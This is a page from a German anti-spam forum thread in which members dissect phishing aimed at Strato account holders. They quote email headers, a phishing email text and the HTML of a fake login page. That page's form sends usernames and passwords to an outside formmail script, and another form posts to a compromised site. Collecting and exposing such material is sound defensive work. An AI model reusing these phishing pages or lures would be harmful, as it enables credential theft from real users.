Seite 3 von 3 ErsteErste 123
Ergebnis 21 bis 28 von 28

Thema: Strato Account Phishing

  1. #21
    Graue Pestilenz Avatar von Fidul
    Registriert seit
    16.07.2005
    Beiträge
    6.405

    Standard

    Zitat Zitat von yokelplat
    need smtp sever with immidiate effect for my marketing with this Qualifications
    -goes unlimited
    -that can last a month
    -delivers inbox

    if you have pls holla me @ [Link nur für registrierte Mitglieder sichtbar. ] 07044023894
    Noch Fragen?
    Wir kriegen euch alle!

  2. #22
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Ja, das ist er:

    [Link nur für registrierte Mitglieder sichtbar. ]

    Und einen Volkswagen Transporter (Diesel) sucht er auch noch...
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  3. #23
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Tja den ersten Redirektor hat man dem Mugulein gekillt , da mus man halt weitermachen:


    header:
    01: Received: from mo-p06-ob.rzone.de (EHLO mo-p06-ob.rzone.de) [81.169.146.186]
    02: by mx0.gmx.net (mx064) with SMTP; 16 Jul 2012 xx:xx:xx +0200
    03: X-RZG-AUTH::LWckcUGrc/v2//LXhYp9NZBPuzREhM3px+vz7uHh5Q0Z95QhsjxEQa5/d92Gf6bKww==
    04: Message-ID: [ID filtered]
    05: X-RZG-CLASS-ID: [ID filtered]
    06: Received: from [184.22.221.130]
    07: (184-22-221-130.static.hostnoc.net [184.22.221.130])
    08: by smtp.strato.de (jored mo2) (RZmta 29.19 AUTH)
    09: with (DHE-RSA-AES256-SHA encrypted) ESMTPA ID: [ID filtered]
    10: Mon, 16 Jul 2012 xx:xx:xx +0200 (CEST)

    gecrackt: [Link nur für registrierte Mitglieder sichtbar. ]

    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    dann wieder weiter zur altbekannten Adresse. Spamcop leitet Reports an Inforelay gar nicht mehr weiter, scheint also ein altbekannter Schwarzhut zu sein.
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  4. #24
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    10.602

    Standard

    Was für ein Honk:
    [html]<form name="loginForm" method="POST" action="http://www.haisoft.net/webtools/formmail.php"> <input type=hidden name="recipient" value=" [Link nur für registrierte Mitglieder sichtbar. ]"> <input type=hidden name="subject" value="STRATO SCAMM - Powered By YOKELPLATFORM"> <input type=hidden name="redirect" value="http://users10.jabry.com/thankkkyoudanke/Redirect.htm">[/html]
    Wie heise das so schön: "Friss Spammer, Friss!"
    [Link nur für registrierte Mitglieder sichtbar. ]
    [Link nur für registrierte Mitglieder sichtbar. ]
    [Link nur für registrierte Mitglieder sichtbar. ]
    [Link nur für registrierte Mitglieder sichtbar. ]
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

  5. #25
    Graue Pestilenz Avatar von Fidul
    Registriert seit
    16.07.2005
    Beiträge
    6.405

    Standard

    Der Kern seiner Seite ist folgender:
    Code:
    <html>
     <head>
      <title>Mugu-Phishing</title>
     </head>
     <body>
      <form name="loginForm" method="POST" action="http://www.haisoft.net/webtools/formmail.php">
       <input type=hidden  name="recipient" value="
    
    [Link nur für registrierte Mitglieder sichtbar. 
    
    ]">
       <input type=hidden name="subject" value="STRATO SCAMM - Powered By  YOKELPLATFORM">
       User:
       <input name='login_user_inputbox' id='login_user_inputbox' type='text' class='textbox_input' tabindex='1' value=''>
       <br>
       Pass:
       <input name='login_pass_inputbox' type='password' class='textbox_input' id='login_pass_inputbox' tabindex='2' value=''>
       <br>
       <input type="submit" class="big_button" tabindex='3' title='Click here to log in.' value="LOGIN">
      </form>
     </BODY>
    </HTML>
    Damit kann man ihn kurzzeitig sehr glücklich machen. Im Rauschen plausibler Fehlschläge gehen die echten Treffer möglicherweise unter.
    Wir kriegen euch alle!

  6. #26
    Graue Pestilenz Avatar von Fidul
    Registriert seit
    16.07.2005
    Beiträge
    6.405

    Standard

    Sehr schön, seine Phishingseiten sind tot und der Formmail-Betreiber hat ihn auch blockiert.

    Dann muß er wohl wieder ran...
    Wir kriegen euch alle!

  7. #27
    Mitglied
    Registriert seit
    30.01.2011
    Ort
    Thüringen
    Beiträge
    470

    Standard Alle Jahre wieder...

    Heute hier aufgeschlagen. Der Text in fürchterlichem Deutsch mit Einstreuungen kyrillischer Buchstaben verfasst.

    [HTML]<HTML><HEAD><TITLE></TITLE>
    </HEAD>
    <BODY bgcolor=#FFFFFF leftmargin=5 topmargin=5 rightmargin=5 bottommargin=5>
    <FONT size=2 color=#000000 face="Arial">
    <DIV>
    <IMG align=baseline border=0 width=168 height=38 src="cid:00B5F17C20F8$0085F805$0100007f@icouvidmuumlgbb"></DIV>
    <DIV>
    <B>Lieber Kontoinhaber,</B></DIV>
    <DIV>
    <B>Wir sind derzeit in Kontofьhrung Dienst beschдftigt.</B></DIV>
    <DIV>
    <B>Als Kontoinhaber, sind Sie verpflichtet, Ihre kontinuierliche Mitgliedschaft zu bestдtigen.</B></DIV>
    <DIV>
    <B>Nichtbeachtung Ihre kontinuierliche Mitgliedschaft zu bestдtigen wird Aussetzen des Dienstes fьhren.</B></DIV>
    <DIV>
    <A href="http://ow.ly/hRFTr"><U>Ameldung zu aktualisieren und zu bestдtigen, in einem einfachen Schritt.</U></A></DIV>
    <DIV>
    <B>BITTE BEACHTEN SIE: Dies ist eine obligatorische MaЯnahme.</B></DIV>
    <DIV>
    <B>Danke</B></DIV>
    <DIV>
    <B>STRATO AG Admin Update ®</B></DIV>
    <DIV>
    <B>Copyright © 2013 STRATO AG</B></DIV>
    </FONT>
    </BODY></HTML>[/HTML]



    header:
    01: Return-Path: wer_wohl_ich [at] web.de
    02: Received: from mout.web.de ([212.227.17.11]) by mx-ha.gmx.net (mxgmx005) with
    03: ESMTP (Nemesis) ID: [ID filtered]
    04: 2013 xx:xx:xx +0100
    05: Received: from fep17.mx.upcmail.net ([62.179.121.37]) by mx-ha.web.de
    06: (mxweb005) with ESMTP (Nemesis) ID: [ID filtered]
    07: <auch_ich [at] gmx.de>; Tue, 19 Feb 2013 xx:xx:xx +0100
    08: Received: from edge01.upcmail.net ([192.168.13.236])
    09: by viefep17-int.chello.at
    10: (InterMail vM.8.01.05.05 201-2260-151-110-20120111) with ESMTP
    11: ID: [ID filtered]
    12: Tue, 19 Feb 2013 xx:xx:xx +0100
    13: Received: from User ([91.228.0.129])
    14: by edge01.upcmail.net with edge
    15: ID: [ID filtered]
    16: X-SourceIP: 91.228.0.129
    17: X-Authenticated-Sender: auch_ein_opfer [at] kabelbw.de
    18: From: "service [at] strato.de"<auch_ein_opferl [at] kabelbw.de>

    Der Spam wurde über eine Server in Bischhofshofen eingestreut. whois:62.179.121.37

    Gruß

    Isenächer

  8. #28
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Wider mal der Blöd-Ganove mit dem Mailanhang:


    header:
    01: Received: from ae0000-mailfallback17.eo.k-opti.ad.jp ([203.140.81.46]) by
    02: mx-ha.gmx.net (mxgmx003) with ESMTP (Nemesis) ID: [ID filtered]
    03: Received: from mailout14.eonet.ne.jp (mailout01 [10.36.196.202]) by
    04: ae0000-mailfallback17.eo.k-opti.ad.jp (Postfix) with ESMTP ID: [ID filtered]
    05: Received: from ae0000-mailauth13.eo.k-opti.ad.jp (mailauth01 [10.36.196.204])
    06: by ae0000-mailout14.eo.k-opti.ad.jp (Postfix) with ESMTP ID: [ID filtered]
    07: Received: from ae0000-mailauth13.eo.k-opti.ad.jp (localhost.localdomain
    08: [127.0.0.1]) by ae0000-mailauth13.eo.k-opti.ad.jp (Postfix) with ESMTP ID: [ID
    09: filtered]
    10: Received: from User (mikerudd4.pndsl.co.uk [81.174.251.76]) by
    11: ae0000-mailauth13.eo.k-opti.ad.jp (Postfix) with ESMTP ID: [ID filtered]

    Sehr geehrter Abonnent,

    Wir arbeiten derzeit an der Kontofьhrung.
    Als Abonnent sind Sie verpflichtet, Ihre fortgesetzte Mitgliedschaft
    bestдtigen.
    Aktualisieren Sie Ihr Konto bei uns jetzt.

    verwenden Strato-Portal htm unten, um Ihr Konto zu aktualisieren

    BITTE BEACHTEN SIE: Dies ist eine ZwangsmaЯnahme. Nichtbeachtung kann zu
    Service-Suspension fьhren
    Danke

    STRATO AG Admin ®

    © Deutsche STRATO AG 2013
    Im Anhang: [HTML]<form method="POST" action="http://www.mcitv.ca/images/stories/de.php">[/HTML]

    IP: 97.74.221.90 ---> ip-97-74-221-90.ip.secureserver.net/Godaddy
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

Seite 3 von 3 ErsteErste 123

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen